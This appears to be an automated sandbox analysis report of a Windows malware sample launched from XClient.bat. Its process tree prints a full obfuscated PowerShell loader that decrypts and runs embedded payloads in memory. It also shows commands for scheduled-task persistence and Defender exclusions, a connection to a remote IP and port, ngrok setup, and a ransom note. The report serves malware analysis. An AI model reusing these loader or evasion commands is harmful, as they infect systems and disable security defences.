\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 3656 NOTEPAD.EXE -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
explorer.exepid process 4800 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystem Userpowershell.exeSystem UserSystem Usermsedge.exemsedge.exeSystem Userpid process 4072 powershell.exe 4072 powershell.exe 3184 powershell.exe 3184 powershell.exe 3184 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3180 powershell.exe 3180 powershell.exe 3180 powershell.exe 4380 powershell.exe 4380 powershell.exe 4380 powershell.exe 3224 powershell.exe 3224 powershell.exe 3224 powershell.exe 3184 powershell.exe 3184 powershell.exe 3184 powershell.exe 3752 powershell.exe 3616 System User 3616 System User 3616 System User 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 1864 System User 1864 System User 1732 System User 1732 System User 1840 msedge.exe 1840 msedge.exe 4112 msedge.exe 4112 msedge.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 2360 System User 2360 System User 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
explorer.exepowershell.exepid process 4800 explorer.exe 3752 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
chrome.exemsedge.exepid process 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 1840 msedge.exe 1840 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeIncreaseQuotaPrivilege 3184 powershell.exe Token: SeSecurityPrivilege 3184 powershell.exe Token: SeTakeOwnershipPrivilege 3184 powershell.exe Token: SeLoadDriverPrivilege 3184 powershell.exe Token: SeSystemProfilePrivilege 3184 powershell.exe Token: SeSystemtimePrivilege 3184 powershell.exe Token: SeProfSingleProcessPrivilege 3184 powershell.exe Token: SeIncBasePriorityPrivilege 3184 powershell.exe Token: SeCreatePagefilePrivilege 3184 powershell.exe Token: SeBackupPrivilege 3184 powershell.exe Token: SeRestorePrivilege 3184 powershell.exe Token: SeShutdownPrivilege 3184 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeSystemEnvironmentPrivilege 3184 powershell.exe Token: SeRemoteShutdownPrivilege 3184 powershell.exe Token: SeUndockPrivilege 3184 powershell.exe Token: SeManageVolumePrivilege 3184 powershell.exe Token: 33 3184 powershell.exe Token: 34 3184 powershell.exe Token: 35 3184 powershell.exe Token: 36 3184 powershell.exe Token: SeIncreaseQuotaPrivilege 3184 powershell.exe Token: SeSecurityPrivilege 3184 powershell.exe Token: SeTakeOwnershipPrivilege 3184 powershell.exe Token: SeLoadDriverPrivilege 3184 powershell.exe Token: SeSystemProfilePrivilege 3184 powershell.exe Token: SeSystemtimePrivilege 3184 powershell.exe Token: SeProfSingleProcessPrivilege 3184 powershell.exe Token: SeIncBasePriorityPrivilege 3184 powershell.exe Token: SeCreatePagefilePrivilege 3184 powershell.exe Token: SeBackupPrivilege 3184 powershell.exe Token: SeRestorePrivilege 3184 powershell.exe Token: SeShutdownPrivilege 3184 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeSystemEnvironmentPrivilege 3184 powershell.exe Token: SeRemoteShutdownPrivilege 3184 powershell.exe Token: SeUndockPrivilege 3184 powershell.exe Token: SeManageVolumePrivilege 3184 powershell.exe Token: 33 3184 powershell.exe Token: 34 3184 powershell.exe Token: 35 3184 powershell.exe Token: 36 3184 powershell.exe Token: SeIncreaseQuotaPrivilege 3184 powershell.exe Token: SeSecurityPrivilege 3184 powershell.exe Token: SeTakeOwnershipPrivilege 3184 powershell.exe Token: SeLoadDriverPrivilege 3184 powershell.exe Token: SeSystemProfilePrivilege 3184 powershell.exe Token: SeSystemtimePrivilege 3184 powershell.exe Token: SeProfSingleProcessPrivilege 3184 powershell.exe Token: SeIncBasePriorityPrivilege 3184 powershell.exe Token: SeCreatePagefilePrivilege 3184 powershell.exe Token: SeBackupPrivilege 3184 powershell.exe Token: SeRestorePrivilege 3184 powershell.exe Token: SeShutdownPrivilege 3184 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeSystemEnvironmentPrivilege 3184 powershell.exe Token: SeRemoteShutdownPrivilege 3184 powershell.exe Token: SeUndockPrivilege 3184 powershell.exe Token: SeManageVolumePrivilege 3184 powershell.exe Token: 33 3184 powershell.exe Token: 34 3184 powershell.exe Token: 35 3184 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
rundll32.exeiexplore.exefirefox.exechrome.exepid process 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 2060 rundll32.exe 1908 iexplore.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
firefox.exechrome.exepid process 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 3616 firefox.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
powershell.exeexplorer.exeiexplore.exeIEXPLORE.EXEfirefox.exeLogonUI.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exepid process 3752 powershell.exe 4800 explorer.exe 4800 explorer.exe 1908 iexplore.exe 1908 iexplore.exe 3700 IEXPLORE.EXE 3700 IEXPLORE.EXE 3616 firefox.exe 6248 LogonUI.exe 5844 MEMZ.exe 5224 MEMZ.exe 5220 MEMZ.exe 4656 MEMZ.exe 5940 MEMZ.exe 5844 MEMZ.exe 5224 MEMZ.exe 5220 MEMZ.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.execvtres.exepowershell.exemsedge.exedescription pid process target process PID 1664 wrote to memory of 4984 1664 cmd.exe net.exe PID 1664 wrote to memory of 4984 1664 cmd.exe net.exe PID 4984 wrote to memory of 3224 4984 net.exe net1.exe PID 4984 wrote to memory of 3224 4984 net.exe net1.exe PID 1664 wrote to memory of 4072 1664 cmd.exe powershell.exe PID 1664 wrote to memory of 4072 1664 cmd.exe powershell.exe PID 4072 wrote to memory of 3184 4072 powershell.exe powershell.exe PID 4072 wrote to memory of 3184 4072 powershell.exe powershell.exe PID 4072 wrote to memory of 1092 4072 powershell.exe WScript.exe PID 4072 wrote to memory of 1092 4072 powershell.exe WScript.exe PID 1092 wrote to memory of 544 1092 WScript.exe cmd.exe PID 1092 wrote to memory of 544 1092 WScript.exe cmd.exe PID 544 wrote to memory of 4308 544 cmd.exe net.exe PID 544 wrote to memory of 4308 544 cmd.exe net.exe PID 4308 wrote to memory of 2504 4308 net.exe net1.exe PID 4308 wrote to memory of 2504 4308 net.exe net1.exe PID 544 wrote to memory of 3752 544 cmd.exe powershell.exe PID 544 wrote to memory of 3752 544 cmd.exe powershell.exe PID 3752 wrote to memory of 3180 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 3180 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 4380 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 4380 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 3224 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 3224 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 3184 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 3184 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 5056 3752 powershell.exe schtasks.exe PID 3752 wrote to memory of 5056 3752 powershell.exe schtasks.exe PID 3752 wrote to memory of 5108 3752 powershell.exe cvtres.exe PID 3752 wrote to memory of 5108 3752 powershell.exe cvtres.exe PID 3752 wrote to memory of 5108 3752 powershell.exe cvtres.exe PID 3752 wrote to memory of 5108 3752 powershell.exe cvtres.exe PID 3752 wrote to memory of 5108 3752 powershell.exe cvtres.exe PID 3752 wrote to memory of 5108 3752 powershell.exe cvtres.exe PID 3752 wrote to memory of 5108 3752 powershell.exe cvtres.exe PID 3752 wrote to memory of 5108 3752 powershell.exe cvtres.exe PID 5108 wrote to memory of 3452 5108 cvtres.exe powershell.exe PID 5108 wrote to memory of 3452 5108 cvtres.exe powershell.exe PID 5108 wrote to memory of 3452 5108 cvtres.exe powershell.exe PID 3452 wrote to memory of 396 3452 powershell.exe explorer.exe PID 3452 wrote to memory of 396 3452 powershell.exe explorer.exe PID 3452 wrote to memory of 396 3452 powershell.exe explorer.exe PID 3752 wrote to memory of 4248 3752 powershell.exe taskkill.exe PID 3752 wrote to memory of 4248 3752 powershell.exe taskkill.exe PID 3752 wrote to memory of 1952 3752 powershell.exe ngrok.exe PID 3752 wrote to memory of 1952 3752 powershell.exe ngrok.exe PID 3752 wrote to memory of 1952 3752 powershell.exe ngrok.exe PID 3752 wrote to memory of 4432 3752 powershell.exe msedge.exe PID 3752 wrote to memory of 4432 3752 powershell.exe msedge.exe PID 1840 wrote to memory of 4464 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 4464 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe PID 1840 wrote to memory of 3796 1840 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:3224
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_595_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_595.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_595.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_595.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:2504
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_595.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_595.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3184
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5056
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.22 34085 <123456789> BD45BAA9E59375C2A83F6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text8⤵
- System Location Discovery: System Language Discovery
PID:396
-
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /im ngrok.exe /f6⤵
- Kills process with taskkill
PID:4248
-
-
C:\Users\Admin\AppData\Local\Temp\ngrok.exe"C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken Your_Authtoken6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html6⤵PID:4432
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\ykvqgq.gif6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1908 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1908 CREDAT:17410 /prefetch:27⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yansrl.bat" "6⤵PID:4600
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4216,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=1040 /prefetch:81⤵PID:512
-
C:\Users\Admin\AppData\Roaming\System User"C:\Users\Admin\AppData\Roaming\System User"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3616
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4800
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵PID:4440
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {515980c3-57fe-4c1e-a561-730dd256ab98} -Embedding1⤵
- Suspicious use of FindShellTrayWindow
PID:2060
-
C:\Users\Admin\AppData\Roaming\System User"C:\Users\Admin\AppData\Roaming\System User"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=2140,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:11⤵PID:2916
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4144,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:11⤵PID:5000
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5452,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=5464 /prefetch:81⤵PID:3636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5440,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:81⤵PID:3332
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.89 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.86 --initial-client-data=0x238,0x23c,0x240,0x234,0x29c,0x7ffa1f0bd198,0x7ffa1f0bd1a4,0x7ffa1f0bd1b02⤵PID:4464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2204,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:22⤵PID:3796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1868,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:32⤵PID:664
-
-
